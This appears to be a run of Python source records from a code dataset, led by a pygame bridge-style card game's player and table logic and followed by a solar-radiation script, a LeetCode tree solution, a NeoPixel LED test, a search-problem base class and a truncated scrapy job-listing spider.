self.players[i].add_ai(ai.RandomAI(self.table_status))\n\n self.players_playzone.append(cards.Deck(playdeckx[i], playdecky[i],\n w_deck, w_deck, 0))\n for j in range(3):\n surf = pygame.Surface((stats_width, self.stats_height / 3), pygame.SRCALPHA)\n rendered_text = self.player_font.render(\"Player {0:d}\".format(i), True,\n (255, 0, 255)).convert_alpha()\n self.center_text_on_surface(surf, rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n self.player_stats[i].append(surf)\n\n if autoplay:\n self.players[0].add_ai(ai.RandomAI(self.table_status))\n\n # Announcer positioning and surface creation\n announcer_margins = 5\n announcer_spacing = announcer_margins + w_deck\n self.announcer_x = playfield_x + announcer_spacing\n self.announcer_y = playfield_y + announcer_spacing\n self.announcer_width = playfield_width - 2 * announcer_spacing\n self.announcer_height = playfield_height - 2 * announcer_spacing\n self.announcer_line = []\n for i in range(3):\n surf = pygame.Surface((self.announcer_width, self.announcer_height/3), pygame.SRCALPHA)\n self.announcer_line.append(surf)\n\n self.update_all_players(role=True, wins=True)\n\n self.write_message(\"Press P to play!\")\n\n self.ongoing = False\n\n\n\n def center_text_on_surface(self, surf, rendered_text, clear_colour):\n line_center = surf.get_rect().center\n text_rect = rendered_text.get_rect(center=line_center)\n surf.fill(clear_colour)\n surf.blit(rendered_text, text_rect)\n\n def write_message(self, text, delay_time=0.5, line=0, update_now=True):\n \"\"\"\n Write a message into the center board surface (announcer)\n :param text: String to be displayed on the center board\n :param delay_time: How much delay to put once the string is display\n :param line: Which line of the announcer to write to\n :return: None\n \"\"\"\n if 0 <= line < len(self.announcer_line):\n print(text)\n text = text.strip('\\n')\n rendered_text = self.table_font.render(text, True, (255, 255, 255)).convert_alpha()\n self.center_text_on_surface(self.announcer_line[line], rendered_text,\n (255, 255, 255, 255*VIEW_TRANSPARENT))\n if update_now:\n self.update_table.emit()\n time.sleep(delay_time)\n\n def update_players_role(self, player_num, update_now=True):\n self.player_stats[player_num][1].fill((255, 255, 255, 255*VIEW_TRANSPARENT))\n if self.players[player_num].role == PlayerRole.DEFENDER:\n rendered_text = self.player_font.render(\"Defender\", True, (0, 64, 192)).convert_alpha()\n self.center_text_on_surface(self.player_stats[player_num][1], rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n elif self.players[player_num].role == PlayerRole.ATTACKER:\n rendered_text = self.player_font.render(\"Attacker\", True, (192, 0, 0)).convert_alpha()\n self.center_text_on_surface(self.player_stats[player_num][1], rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n if update_now:\n self.update_table.emit()\n\n def update_player_wins(self, player_num, update_now=True):\n self.player_stats[player_num][2].fill((255, 255, 255, 255*VIEW_TRANSPARENT))\n if self.players[player_num].score > 1:\n rendered_text = self.player_font.render(\"Wins: {0:d}\".format(self.players[player_num].score), True,\n (255, 255, 255)).convert_alpha()\n else:\n rendered_text = self.player_font.render(\"Win: {0:d}\".format(self.players[player_num].score), True,\n (255, 255, 255)).convert_alpha()\n self.center_text_on_surface(self.player_stats[player_num][2], rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n if update_now:\n self.update_table.emit()\n\n def 
update_all_players(self, role=False, wins=True):\n for i in range(4):\n if wins:\n self.update_player_wins(i, update_now=False)\n if role:\n self.update_players_role(i, update_now=False)\n self.update_table.emit()\n\n def display_current_player(self, current=-1):\n if current >= 0:\n print(\"Player {0:d}\\n\".format(current))\n for i in range(4):\n rendered_text = self.player_font.render(\"Player {0:d}\".format(i), True,\n (255, 0, 255)).convert_alpha()\n if i == current:\n self.center_text_on_surface(self.player_stats[i][0], rendered_text,\n (0, 64, 0, 255))\n else:\n self.center_text_on_surface(self.player_stats[i][0], rendered_text,\n (255, 255, 255, 255 * VIEW_TRANSPARENT))\n\n self.update_table.emit()\n\n def update_team_scores(self):\n if self.table_status['partner reveal']:\n msg = \"Defender: {0:d}/{2:d}, Attacker: {1:d}/{3:d}\\n\".format(self.table_status['defender']['wins'],\n self.table_status['attacker']['wins'],\n self.table_status['defender']['target'],\n self.table_status['attacker']['target'])\n self.write_message(msg, line=2)\n else:\n msg = \"Defender: {0:d}?/{1:d}, Attacker: ?/{2:d}\\n\".format(self.table_status['defender']['wins'],\n self.table_status['defender']['target'],\n self.table_status['attacker']['target'])\n self.write_message(msg, line=2)\n\n def get_pos(self):\n return self.x, self.y\n\n def continue_game(self):\n \"\"\"\n This is where the FSM is. State transition should occur here.\n What takes place in the state should be in a function.\n :return: None\n \"\"\"\n # TODO: Adjust the timing of sleep\n if self.game_state == GameState.DEALING:\n self.shuffle_and_deal()\n self.write_message(\"Shuffle Complete!\")\n self.game_state = GameState.POINT_CHECK\n\n elif self.game_state == GameState.POINT_CHECK:\n if self.check_reshuffle():\n self.write_message('Reshuffle Initiated!', line=1)\n self.game_state = GameState.ENDING\n else:\n self.write_message('No Reshuffle needed!')\n self.game_state = GameState.BIDDING\n self.write_message(\"Start to Bid\")\n self.prepare_bidding()\n elif self.game_state == GameState.BIDDING:\n bid_complete = self.start_bidding()\n if bid_complete:\n self.game_state = GameState.PLAYING\n self.update_all_players(role=True, wins=True)\n self.update_team_scores()\n\n elif self.game_state == GameState.PLAYING:\n self.play_a_round()\n if self.current_round == 13:\n self.write_message(\"Game Set! Press P to play again!\")\n self.ongoing = False\n self.game_state = GameState.ENDING\n else:\n self.reset_game()\n self.game_state = GameState.DEALING\n\n def shuffle_and_deal(self):\n \"\"\"\n Shuffle and deal the discard deck to the players, which should have 52 cards.\n :return: None\n \"\"\"\n if self.discard_deck:\n for i in range(10):\n random.shuffle(self.discard_deck)\n for player in self.players:\n for i in range(STARTING_HAND):\n player.add_card(self.discard_deck.pop())\n self.update_table.emit()\n\n def check_reshuffle(self):\n \"\"\"\n Detect any possible reshuffle request within the players\n :return: True if reshuffle requested, else False\n \"\"\"\n print(\"Player Point Count\")\n for i, player in enumerate(self.players):\n print(\"Player {0:d}: {1:d}\".format(i, player.get_card_points()))\n if player.get_card_points() < 4:\n self.write_message(\"Low points detected in Player {0:d}! 
\".format(i))\n return player.make_decision(self.game_state, 0)\n\n def prepare_bidding(self):\n # Randomly pick a starting player, whom also is the current bid winner\n self.current_player = random.randint(1, NUM_OF_PLAYERS) - 1\n print(\"Starting Player: {0:d}\".format(self.current_player))\n self.passes = 0\n self.table_status[\"bid\"] = 11 # Lowest Bid: 1 Club by default\n self.first_player = True # Starting bidder \"privilege\" to raise the starting bid\n msg = \"Current Bid: {0:d} {1:s}\".format(self.table_status[\"bid\"] // 10,\n cards.get_suit_string(self.table_status[\"bid\"] % 10))\n self.write_message(msg, line=1, delay_time=0)\n self.display_current_player(self.current_player)\n msg = 'Bid Leader: Player {0:d}'.format((self.current_player - self.passes - 1 * (not self.first_player)) % 4)\n self.write_message(msg, line=2, delay_time=1)\n\n def start_bidding(self):\n \"\"\"\n The bidding procedure.\n :return: Whether bidding is completed\n \"\"\"\n # Highest bid: 7 NoTrump. No further check required\n if self.passes < NUM_OF_PLAYERS - 1 and self.table_status[\"bid\"] < 75:\n player_bid = self.players[self.current_player].make_decision(self.game_state, 0)\n if not player_bid:\n if not self.first_player: # Starting bidder pass do not count at the start\n self.passes += 1\n else:\n self.table_status[\"bid\"] = player_bid\n self.passes = 0\n\n if self.table_status[\"bid\"] < 75:\n self.current_player += 1\n self.current_player %= 4\n msg = \"Current Bid: {0:d} {1:s}\".format(self.table_status[\"bid\"] // 10,\n cards.get_suit_string(self.table_status[\"bid\"] % 10))\n self.write_message(msg, line=1, update_now=False)\n msg = 'Bid Leader: Player {0:d}'.format((self.current_player - self.passes\n - 1 * (not self.first_player)) % 4)\n self.write_message(msg, line=2, update_now=False)\n self.display_current_player(self.current_player)\n if self.first_player:\n self.first_player = False\n time.sleep(0.5)\n return False\n else:\n self.write_message(\"Player {0:d} is the bid winner!\".format(self.current_player), delay_time=1)\n msg = \"Player {0:d} is calling a partner...\".format(self.current_player)\n self.write_message(msg, delay_time=1)\n self.display_current_player(self.current_player)\n # Ask for the partner card\n self.table_status[\"partner\"] = self.players[self.current_player].make_decision(self.game_state, 1)\n\n # Setup the table status before the play starts\n self.table_status['partner reveal'] = False\n self.table_status[\"trump suit\"] = self.table_status[\"bid\"] % 10\n self.table_status[\"trump broken\"] = False\n self.table_status['played cards'] = [0, 0, 0, 0]\n if self.table_status['trump suit'] == 5:\n self.table_status[\"leading player\"] = self.current_player\n else:\n self.table_status[\"leading player\"] = (self.current_player + 1) % 4\n self.table_status['defender']['target'] = self.table_status[\"bid\"] // 10 + 6\n self.table_status['attacker']['target'] = 14 - self.table_status['defender']['target']\n\n # Set the roles of the players\n self.players[self.current_player].role = PlayerRole.DEFENDER\n\n self.write_message('Bidding Complete', delay_time=0)\n msg = 'Trump: {1:s}, Partner: {0:s}'.format(cards.get_card_string(self.table_status[\"partner\"]),\n cards.get_suit_string(self.table_status['trump suit']))\n self.write_message(msg, line=1, delay_time=1)\n return True\n\n def play_a_round(self):\n \"\"\"\n Ask each player to play a valid card and determine the winner of the round\n :return: None\n \"\"\"\n if not any(self.table_status[\"played cards\"]):\n # 
Leading player starts with the leading card, which determines the leading suit\n self.current_player = self.table_status['leading player']\n self.display_current_player(self.current_player)\n card = self.players[self.current_player].make_decision(self.game_state, 0)\n self.table_status[\"played cards\"][self.current_player] = card\n self.players_playzone[self.current_player].add_card(card)\n elif not all(self.table_status[\"played cards\"]):\n # Subsequent player make their plays, following suit if possible\n self.display_current_player(self.current_player)\n print(\"Player {0:d}\\n\".format(self.current_player))\n card = self.players[self.current_player].make_decision(self.game_state, 1)\n self.players_playzone[self.current_player].add_card(card)\n self.table_status[\"played cards\"][self.current_player] = card\n else:\n # Once all player played, find out who wins\n leading_card = self.table_status[\"played cards\"][self.table_status['leading player']]\n card_suits = [card.suit() for card in self.table_status[\"played cards\"]]\n card_nums = [card.number() for card in self.table_status[\"played cards\"]]\n follow_suits = [suit == leading_card.suit() for suit in card_suits]\n trumps = [suit == self.table_status['trump suit'] for suit in card_suits]\n trump_played = any(trumps)\n\n # Break trump if the trump suit is played\n if not self.table_status['trump broken']:\n if trump_played:\n self.table_status['trump broken'] = True\n self.write_message(\"Trump Broken!\", delay_time=1)\n\n # Determine which players to check for winner, and determine winner\n valid_nums = [card_nums[i] * ((follow_suits[i] and not trump_played) or trumps[i]) for i in range(4)]\n winning_player = valid_nums.index(max(valid_nums))\n self.write_message(\"Player {0:d} wins!\\n\".format(winning_player), delay_time=1)\n self.players[winning_player].score += 1\n self.update_player_wins(winning_player)\n\n # Clean up the cards, update score, set the next leading player, update round history\n for deck in self.players_playzone:\n self.discard_deck.append(deck.remove_card())\n\n if self.players[winning_player].role == PlayerRole.DEFENDER:\n self.table_status['defender']['wins'] += 1\n elif self.players[winning_player].role == PlayerRole.ATTACKER:\n self.table_status['attacker']['wins'] += 1\n\n self.table_status['leading player'] = winning_player\n self.table_status['round history'].append(copy.copy(self.table_status[\"played cards\"]))\n self.update_team_scores()\n self.table_status[\"played cards\"] = [0]*4\n self.current_round += 1\n self.update_table.emit()\n return\n\n if not self.table_status['partner reveal']:\n if card.value == self.table_status['partner']:\n self.table_status['partner reveal'] = True\n self.write_message(\"Partner Revealed!\", delay_time=1)\n self.reveal_all_roles(self.current_player)\n self.update_all_players(role=True, wins=False)\n\n self.current_player += 1\n self.current_player %= 4\n self.update_table.emit()\n time.sleep(0.5)\n\n def reveal_all_roles(self, partner):\n self.players[partner].role = PlayerRole.DEFENDER\n self.table_status['defender']['wins'] += self.players[partner].score\n for i in range(4):\n if self.players[i].role == PlayerRole.UNKNOWN:\n self.players[i].role = PlayerRole.ATTACKER\n self.table_status['attacker']['wins'] += self.players[i].score\n\n def reset_game(self):\n for player in self.players:\n while not player.is_empty():\n self.discard_deck.append(player.remove_card())\n player.score = 0\n player.role = PlayerRole.UNKNOWN\n\n for i in range(4):\n 
self.update_players_role(i)\n self.update_player_wins(i)\n self.table_status['defender']['wins'] = 0\n self.table_status['attacker']['wins'] = 0\n self.table_status[\"played cards\"] = [0]*4\n self.table_status['round history'] = []\n self.current_round = 0\n self.write_message(\"\", line=1, update_now=False)\n self.write_message(\"\", line=2)\n self.display_current_player()\n print(len(self.discard_deck))\n self.update_table.emit()\n\n\nclass Player(cards.Deck):\n \"\"\"\n A player is essentially a Deck with decision making function or AI component if it is a bot\n that returns a valid action for the Table/Board.\n\n The player has the knowledge of Table status in the form of a dictionary (as it is mutable, thus passed by ref)\n so all validation is done by the player\n\n Possible decisions, each decision has to be enum maybe:\n - Query the board status (i.e. current round, player status), AI most likely need a lot more\n - Query the last round\n - Attempt to play a card\n - Play the validate move\n\n The player also implements method to play from the terminal\n if it is not a bot.\n\n \"\"\"\n def __init__(self, *args, ai_component=None, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.role = PlayerRole.UNKNOWN\n self.AI = ai_component\n self._table_status = None # This is found in Table and updated through Table\n self.score = 0\n\n def connect_to_table(self, table):\n self._table_status = table\n\n def add_ai(self, ai_comp):\n self.AI = ai_comp\n ai_comp.connect_to_player(self)\n\n def make_decision(self, game_state, sub_state):\n \"\"\"\n The player will need to make a decision depending on the game state and sub-state\n :param game_state: Current game state\n :param sub_state: Sub-state which affects the output for the current game state\n :return: For Bidding: Either a bid or a partner call, int\n For Playing: A Card\n For Reshuffle: bool, True to reshuffle, False otherwise\n \"\"\"\n if game_state == GameState.POINT_CHECK:\n if self.AI:\n return self.AI.request_reshuffle()\n if input(\"Reshuffle? (y/n)\").lower() == 'y':\n return self.request_reshuffle()\n if game_state == GameState.BIDDING:\n if sub_state == 0:\n if self.AI:\n return self.AI.make_a_bid()\n return self.make_a_bid()\n else:\n if self.AI:\n return self.AI.call_partner()\n return self.call_partner()\n if game_state == GameState.PLAYING:\n if self.AI:\n play = self.AI.make_a_play(sub_state)\n [_, pos] = self.check_card_in(play)\n return self.remove_card(pos)\n return self.make_a_play(sub_state)\n\n def make_a_bid(self):\n \"\"\"\n The procedure to make a bid\n :return: A valid bid number\n \"\"\"\n while True:\n bid = input(\"Please input a bid in the format 'number' + 'suit' \\n\"\n \"To pass, enter nothing. \\n\"\n \"e.g 4d is 4 Diamond, 6n is 6 No Trump \\n\")\n\n if not bid:\n return 0\n\n bid = cards.convert_bid_string(bid)\n if bid < 0:\n print(\"Error in processing bid\")\n continue\n\n if self._table_status[\"bid\"] < bid:\n return bid\n else:\n if bid > 75:\n print(\"You cannot bid beyond 7 No Trump\")\n else:\n print(\"You might need to bid higher\")\n\n def call_partner(self):\n \"\"\"\n The procedure to call a partner\n :return: A valid card value\n \"\"\"\n current_card_values = self.get_deck_values()\n while True:\n partner = input(\"Please call your partner card. Enter card number + suit number \\n\"\n \"e.g. 
qs is Queen Spade, 8c is 8 Clubs, ah is Ace Hearts\\n\")\n\n partner = cards.convert_input_string(partner)\n if partner in current_card_values:\n print(\"Please call a card outside of your hand\")\n elif cards.card_check(partner):\n return partner\n else:\n print(\"Invalid card call\")\n\n def make_a_play(self, substate):\n \"\"\"\n The procedure to make a play in a round\n :return: A valid Card\n \"\"\"\n while True:\n play = input(\"Please play a card.Enter card number + suit number \\n\"\n \"e.g. qs is Queen Spade, 8c is 8 Clubs, ah is Ace Hearts\\n\")\n if play == \"v\":\n pprint.pprint(self._table_status)\n else:\n play = cards.convert_input_string(play)\n if play > 0:\n if substate == 0:\n valid = self.check_for_valid_plays(play, True)\n else:\n valid = self.check_for_valid_plays(play, False)\n\n if valid:\n [_, pos] = self.check_card_in(play)\n return self.remove_card(pos)\n\n print(\"Invalid play\")\n\n def view_last_round(self):\n pass\n\n def check_for_valid_plays(self, card, leading):\n \"\"\"\n Check if the card played is valid\n :param card: int\n :param leading: bool\n :return:\n \"\"\"\n if not self.check_card_in(card):\n return False\n card_suit = cards.get_card_suit(card)\n if leading:\n if not self._table_status['trump broken'] and \\\n card_suit == self._table_status['trump suit']:\n if any([not cards.get_card_suit(crd) == self._table_status['trump suit'] for crd in self.get_deck_values()]):\n return False\n else:\n leading_card_suit = self._table_status['played cards'][self._table_status[\"leading player\"]].suit()\n if not card_suit == leading_card_suit and \\\n any([cards.get_card_suit(crd) == leading_card_suit for crd in\n self.get_deck_values()]):\n return False\n\n return True\n\n def get_card_points(self):\n suit_points = 0\n card_points = []\n current_suit = 1\n card_position = 0\n for (i, card) in enumerate(self.cards):\n if card.suit() != current_suit:\n suit_points += (i-card_position) // 5\n card_position = i\n current_suit = card.suit()\n card_points.append(max(0, card.number() - 10))\n suit_points += (STARTING_HAND-card_position) // 5\n return suit_points + sum(card_points)\n\n def request_reshuffle(self):\n # Players can choose NOT to reshuffle\n # But always reshuffle for simplicity\n return True\n\n\nclass MainPlayer(cards.PlayerDeck):\n def __init__(self, *args, ai_component=None, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.AI = ai_component\n self.table_status = None # This is found in Table and updated through Table\n\n def connect_to_table(self, table):\n self.table_status = table\n\n def make_a_bid(self):\n pass\n\n def make_a_play(self):\n pass\n\n def view_last_round(self):\n pass\n\n def check_for_valid_moves(self):\n pass\n\n\nclass TestView(view.PygView):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.table = Table(0, 0, self.width, self.height, (0, 0, 255))\n self.table.update_table.connect(self.draw_table)\n self.draw_table()\n\n def draw_table(self, **kwargs):\n self.screen.blit(self.background, (0, 0))\n self.screen.blit(self.table.background, self.table.get_pos())\n for player in self.table.players:\n self.screen.blit(player.deck_surface, player.get_pos())\n for playerzone in self.table.players_playzone:\n self.screen.blit(playerzone.deck_surface, playerzone.get_pos())\n pygame.display.flip()\n\n def run(self):\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == 
pygame.K_ESCAPE:\n running = False\n if event.key == pygame.K_p:\n print('add cards')\n pass\n\n # milliseconds = self.clock.tick(self.fps)\n # self.playtime += milliseconds / 1000.0\n\n # self.draw_function()\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n test_view = TestView(900, 600, clear_colour=(0, 0, 0))\n test_view.run()\n","sub_path":"players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":33164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
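# --- Bid encoding sketch (not part of the record above) ---
# Table and Player above pack a bid as number * 10 + suit and print it with
# bid // 10 and bid % 10; the code fixes 1 = Club (lowest bid 11) and
# 5 = No Trump (highest bid 75, and the no-trump check `trump suit == 5`).
# The middle suit codes below are an assumption for illustration only.
SUITS = {1: 'Club', 2: 'Diamond', 3: 'Heart', 4: 'Spade', 5: 'No Trump'}

def decode_bid(bid):
    """Split an encoded bid into (number, suit name), e.g. 75 -> (7, 'No Trump')."""
    return bid // 10, SUITS[bid % 10]

assert decode_bid(11) == (1, 'Club')
assert decode_bid(75) == (7, 'No Trump')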
+{"seq_id":"348462650","text":"import numpy as np\nimport pandas as pd\nfrom cea.constants import HOURS_IN_YEAR\n\n\ndef calculate_incident_radiation(radiation, radiation_csv):\n \"\"\"\n Calculate the output file \"radiation_csv\" based on the radiation dataframe.\n :param radiation:\n :param radiation_csv:\n :return:\n \"\"\"\n\n # Import Radiation table and compute the Irradiation in W in every building's surface\n column_names = ['T%i' % (i + 1) for i in range(HOURS_IN_YEAR)]\n for column in column_names:\n # transform all the points of solar radiation into Wh\n radiation[column] = radiation[column] * radiation['Awall_all']\n\n # sum up radiation load per building\n # NOTE: this looks like an ugly hack because it is: in order to work around a pandas MemoryError, we group/sum the\n # columns individually...\n grouped_data_frames = {}\n for column in column_names:\n df = pd.DataFrame(data={'Name': radiation['Name'],\n column: radiation[column]})\n grouped_data_frames[column] = df.groupby(by='Name').sum()\n radiation_load = pd.DataFrame(index=grouped_data_frames.values()[0].index)\n for column in column_names:\n radiation_load[column] = grouped_data_frames[column][column]\n\n incident_radiation = np.round(radiation_load[column_names], 2)\n incident_radiation.to_csv(radiation_csv)\n\n return # total solar radiation in areas exposed to radiation in Watts\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--radiation-pickle', help='path to a pickle of the radiation dataframe')\n parser.add_argument('--radiation-csv', help='path to a pickle of the radiation dataframe')\n args = parser.parse_args()\n\n radiation = pd.read_pickle(args.radiation_pickle)\n calculate_incident_radiation(radiation, args.radiation_csv)\n","sub_path":"legacy/radiation_arcgis/calculate_incident_radiation.py","file_name":"calculate_incident_radiation.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"465625228","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2022/08/30 15:11\r\n# File: 0998.py\r\n# Desc: \r\n\r\n\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, val=0, left=None, right=None):\r\n# self.val = val\r\n# self.left = left\r\n# self.right = right\r\nclass Solution:\r\n def insertIntoMaxTree(self, root: Optional[TreeNode], val: int) -> Optional[TreeNode]:\r\n t = TreeNode(val)\r\n if root.val < val:\r\n t.left = root\r\n return t\r\n cur = root\r\n while cur:\r\n if not cur.right:\r\n cur.right = t\r\n break\r\n elif cur.right.val < val:\r\n t.left = cur.right\r\n cur.right = t\r\n break\r\n cur = cur.right\r\n return root\r\n","sub_path":"Solutions/0998/0998.py","file_name":"0998.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"586201108","text":"import time\nfrom neopixel import *\nimport argparse\n\n# LED strip configuration:\nLED_COUNT = 350 # Number of LED pixels.\nLED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).\n#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 180 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\nSTEP_SIZE = 28 # The size of a step in the unit of LED lights which will be lit up\n\n\ndef clearStrip(strip):\n #Clear all the lights on the strip\n for i in range(0, strip.numPixels(), 1):\n strip.setPixelColor(i, 0)\n strip.show()\n\ndef lightStep(strip, stepNum):\n clearStrip(strip)\n for i in range(stepNum * STEP_SIZE, stepNum * STEP_SIZE + STEP_SIZE, 1):\n if (i==0):\n strip.setPixelColor(i+8, Color(0, 128,0))\n else:\n strip.setPixelColor(i, Color(0, 128, 0))\n strip.show()\n\ndef lightIndv(strip, stepNum):\n clearStrip(strip)\n # For the first step light LEDs 0-35\n if (stepNum == 0):\n for i in range(0, 35, 1):\n strip.setPixelColor(i, Color(0, 128, 0))\n strip.show()\n \n else:\n for i in range(stepNum*STEP_SIZE+7, stepNum*STEP_SIZE+7 + STEP_SIZE, 1):\n strip.setPixelColor(i, Color(0, 128, 0))\n strip.show()\n\n\ndef flashVirginiaTech(strip, secs, wait_ms=500):\n #Flash every other light maroon and orage, then switch\n p = 0\n while p < secs:\n for i in range(0, strip.numPixels(), 1):\n if i % 2 == 0:\n strip.setPixelColor(i, Color(0, 128, 0))\n if i % 2 == 1:\n strip.setPixelColor(i, Color(128, 255, 0))\n strip.show()\n time.sleep(wait_ms/1000.0)\n for i in range(0, strip.numPixels(), 1):\n if i % 2 == 0:\n strip.setPixelColor(i, Color(128, 255, 0))\n if i % 2 == 1:\n strip.setPixelColor(i, Color(0, 128, 0))\n strip.show()\n time.sleep(wait_ms/1000.0)\n p += 1\n\n\n# Main program logic follows:\nif __name__ == '__main__':\n # Process arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')\n args = parser.parse_args()\n\n # Create NeoPixel object with appropriate configuration.\n strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\n # Intialize the library (must be called once before other functions).\n strip.begin()\n\n print ('Press Ctrl-C to quit.')\n if not args.clear:\n print('Use \"-c\" argument to clear LEDs on exit')\n try:\n print(\"Let's try lighting up steps 1-10\\n\")\n for i in range(0, 10, 1):\n for x in range(0,10,1):\n print(\"Lighting step %d\", x)\n lightIndv(strip, x)\n time.sleep(500/1000.0)\n clearStrip(strip)\n\n #flashVirginiaTech(strip, 2)\n #clearStrip(strip)\n\n #x =2 \n #print(\"Turn on step {}\".format(x))\n #lightIndv(strip, x)\n #time.sleep(10)\n #clearStrip(strip)\n\n except KeyboardInterrupt:\n if args.clear == False:\n clearStrip(strip)\n\n\n","sub_path":"testLights.py","file_name":"testLights.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"295278790","text":"#Node Representation\nclass Node:\n\n #Constructor\n def __init__(self, state, parent_node, operator, depth, path_cost):\n self.state = state\n self.parent_node = parent_node\n self.operator = operator\n self.depth = depth\n self.path_cost = path_cost\n\n \n\n#Problem Formulation\nclass General_problem:\n\n #Constructor\n def __init__(self, initial_state, operators, goal_test):\n self.initial_state = initial_state\n self.operator = operators #List of available operators\n self.goal_test = goal_test\n self.path_cost = 0 #initial path cost always 0\n\n #Define General Successor Function that takes a node and returns (state, action) pairs possible resulting\n def successor_function(self, node):\n successors = [];\n return successors\n \n #Define General Cost Function that whenever we expand a node it updates its cost by adding the edge cost\n def path_cost_function(self, node):\n extra_cost = 0\n #Given a file name such us pathcosts\n text_name = input(\"Please Enter your file name: \")\n text_name = text_name +\".txt\"\n f = open(text_name, 'r')\n for i in f:\n #for each line in the file\n line = i.split()\n #read the distance between the node and its parent node line[2]\n if (line[0] == node.parent_node.state and line[1] == node.state) or (line[1] == node.parent_node.state and line[0] == node.state):\n extra_cost = int(line[2])\n break\n #add the cost of getting to that state from the previous state to the total path cost leading to the parent node\n return extra_cost + node.parent_node.path_cost\n","sub_path":"General.py","file_name":"General.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"99172945","text":"\"\"\"\nThis spider is a ApprenticeshipVacancy spider created on top of the ATSSpider\nscrapy crawl apprenticeshipvacancy -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://apprenticeshipvacancymatchingservice.lsc.gov.uk/navms/Forms/Vacancy/SearchVacancy.aspx\"\n\nsample url:\n https://apprenticeshipvacancymatchingservice.lsc.gov.uk/navms/Forms/Vacancy/SearchVacancy.aspx\n\"\"\"\n\nfrom urlparse import urljoin\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.selector import Selector\nfrom urlparse import urlparse\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, NormalizedJoin, ConvertDateString\nfrom brightcorp.lib.utils import get_hidden_inputs\n\n\nclass ApprenticeshipVacancy(ATSSpider):\n\n name = \"apprenticeshipvacancy\"\n ref_re = r'(\\d+)$'\n page = 0\n download_delay = 0.3\n tot_pages = ''\n is_first_page = True\n\n def parse(self, response):\n formdata = get_hidden_inputs(response)\n formdata['ctl00$ContentBody$SearchByRadioButtonList'] = 'Occupation'\n formdata['ctl00$ContentBody$ApprenticeshipOccupationDropDownList'] = '0'\n formdata['ctl00$ContentBody$ApprenticeshipFrameworkListBox'] = '0'\n formdata['ctl00$ContentBody$ApprenticeshiptypeOldValue'] = '999'\n formdata['ctl00$ContentBody$ApprenticeshipCategoryRadioButtonList'] = '0'\n formdata['ctl00$ContentBody$ApprenticeshiptypeDropDownList'] = '999'\n formdata['ctl00$ContentBody$SearchButton'] = 'Search'\n req = FormRequest(\n response.url, formdata=formdata, callback=self.parse_jobs_list\n )\n yield req\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n if not self.tot_pages:\n tot_pages = sel.xpath(\n '//select[contains(@name, \"PagesDropDownList\")]/option[1]/text()'\n ).re(self.ref_re)\n if tot_pages:\n self.tot_pages = tot_pages[0]\n\n jobs = sel.xpath('//table[@class=\"results\"]//tr[td]')\n for job in jobs:\n job_url = job.xpath('./td[1]/a/@href').extract()\n if job_url:\n job_url = urljoin(response.url, job_url[0])\n meta = {\n 'title': job.xpath('./td[1]/a//text()').extract(),\n 'loc': job.xpath('./td[3]/span/text()').extract(),\n 'cat': job.xpath('./td[4]/text()').extract(),\n 'date': job.xpath('./td[5]/text()').extract(),\n }\n yield Request(\n job_url, callback=self.parse_job_callback(), meta=meta\n )\n\n if self.is_first_page and self.tot_pages:\n self.is_first_page = False\n for i in xrange(1, int(self.tot_pages) + 1, 1):\n formdata = get_hidden_inputs(response)\n formdata['ctl00$ContentBody$ResultsPager$PagesDropDownList'] = str(i)\n yield FormRequest(\n response.url, callback=self.parse_jobs_list, formdata=formdata\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('location', response.meta.get('loc'))\n loader.add_value('jobcategory', response.meta.get('cat'))\n loader.add_value(\n 'expiration_date', response.meta.get('date'), ConvertDateString('%d/%m/%Y')\n )\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.ref_re\n )\n\n loader.add_xpath('baseSalary', '//p[@id=\"vacancy-wage\"]/text()')\n loader.add_xpath('workhours', '//p[@itemprop=\"workHours\"]/text()')\n loader.add_xpath('requirements', '//section[@id=\"course-info\"]/node()')\n loader.add_xpath('duration', 